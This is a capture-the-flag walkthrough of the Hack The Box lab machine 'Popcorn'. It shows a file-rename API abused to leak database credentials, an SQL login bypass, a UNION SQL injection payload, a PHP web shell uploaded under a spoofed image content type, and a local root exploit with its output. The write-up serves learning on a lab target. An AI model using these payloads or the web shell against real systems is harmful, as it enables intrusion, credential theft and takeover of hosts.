Post

🟠 HTB - Popcorn

Posted Updated
By
2 min read
🟠 HTB - Popcorn

https://i.ibb.co/b6xZz9t/Popcorn.png

# System Info & Credentials

IP:10.10.10.6
OS:Ubuntu 9.10 “Karmic Koala”
Hosts:popcorn.htb
Credentials:torrent:SuperSecret!!

# Nmap Result

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

root@kali:~/HTB/popcorn# nmap -p22,80 -sT 10.10.10.6 --min-rate 10000 -sV -sC
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-21 13:48 UTC
Nmap scan report for 10.10.10.6 (10.10.10.6)
Host is up (0.057s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12
|_http-title: Did not follow redirect to http://popcorn.htb/
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: Host: popcorn.hackthebox.gr; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.90 seconds
root@kali:~/HTB/popcorn#

# Open Ports & To-Do

22/tcp SSHOpenSSH 5.1p1-6ubuntu2Need Credentials
80/tcp HTTPApache/2.2.12Web Enumerate

# Enumeration Notes

Web-Enum:

https://i.ibb.co/ZG8ngW6/resim-2025-01-23-141548690.png

Directory & Files

1
2
3
4
5
6
7
8
9
10
11
12
13

/index/
/test/ -> phpinfo() page
/torrent/ -> TorrentHoster
	/torrents.php
	/comment
	/config.php
	/database/th_database.sql -> admin:admin12
	/login
	/upload.php
	/upload -> uploads directory
	/readme
	/lib -> Index of /torrent/lib
/rename/ -> api

/torrent/

https://i.ibb.co/YhsKdDw/resim-2025-01-23-142222893.png

# Vulnerabilities

Rename Files

We can change files name with rname api.

For example, you can read the config.php file by changing its name to config.txt.

1
2

/rename/
		Renamer API Syntax: index.php?filename=old_file_path_an_name&newfilename=new_file_path_and_name

1
2
3
4

/rename/index.php?filename=/var/www/torrent/config.php&newfilename=/var/www/torrent/lib/config.txt
	  $CFG->dbName = "torrenthoster";	//db name
	  $CFG->dbUserName = "torrent";    //db username
	  $CFG->dbPassword = "SuperSecret!!";	//db password

Authentication Bypass

1

/torrent/login (Authentication Bypass) -> admin' or 1='1

SQL Injection

1

/torrent/torrents.php (There is sqli on search box) -> test' union select null,group_concat(schema_name),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from information_schema.schemata-- -

File Upload (Authenticated)

https://i.ibb.co/1X73pKn/resim-2025-01-23-142803287.png

# Foothold

SQL Injection

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

/torrent/torrents.php (There is sqli on search box) -> test' union select null,group_concat(schema_name),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from information_schema.schemata-- -
database:information_schema
database:torrenthoster
	tables:ban
	tables:categories
	tables:comments
	tables:log
	tables:namemap
	tables:news
	tables:subcategories
	tables:users
		columns:id
		columns:userName
		columns:password
		columns:privilege
		columns:email
		columns:joined
		columns:lastconnect
	
dumped -> Admin : d5bfedcee289e5e05b86daad8ee3e2e2 : admin : admin@yourdomain.com (couldn't crack this hash)

Upload Shell

https://i.ibb.co/1X73pKn/resim-2025-01-23-142803287.png

Request Body:

Changed the content type header application/x-php to image/jpeg

1
2
3
4
5
6
7
8
9
10
11
12

-----------------------------239990188727439809613051752681
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg

<?php system($_GET["cmd"]);?>

-----------------------------239990188727439809613051752681
Content-Disposition: form-data; name="submit"

Submit Screenshot
-----------------------------239990188727439809613051752681--

Response Body:

1
2
3
4
5

Upload: cmd.php
Type: image/jpeg
Size: 0.029296875 Kb
Upload Completed.
Please refresh to see the new screenshot.

1
2

http://popcorn.htb/torrent/upload/723bc28f9b6f924cca68ccdff96b6190566ca6b4.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

# Privilege Escalation

check os version

1
2
3
4
5
6
7
8
9
10

www-data@popcorn:/home/george$ uname -a
uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
www-data@popcorn:/home/george$ cat /etc/*release*
cat /etc/*release*
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=9.10
DISTRIB_CODENAME=karmic
DISTRIB_DESCRIPTION="Ubuntu 9.10"
www-data@popcorn:/home/george$

https://www.exploit-db.com/exploits/14339

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

www-data@popcorn:/tmp$ ls
privesc.sh  vgauthsvclog.txt.0	vmware-root
www-data@popcorn:/tmp$ ./privesc.sh 
[*] Ubuntu PAM MOTD local root
[*] SSH key set up
[*] spawn ssh
[+] owned: /etc/passwd
[*] spawn ssh
[+] owned: /etc/shadow
[*] SSH key removed
[+] Success! Use password toor to get root
Password: 
root@popcorn:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@popcorn:/tmp#
CTF, Hack The Box
hackthebox ctf hacking writeup Popcorn walkthrough medium linux
This post is licensed under CC BY 4.0 by the author.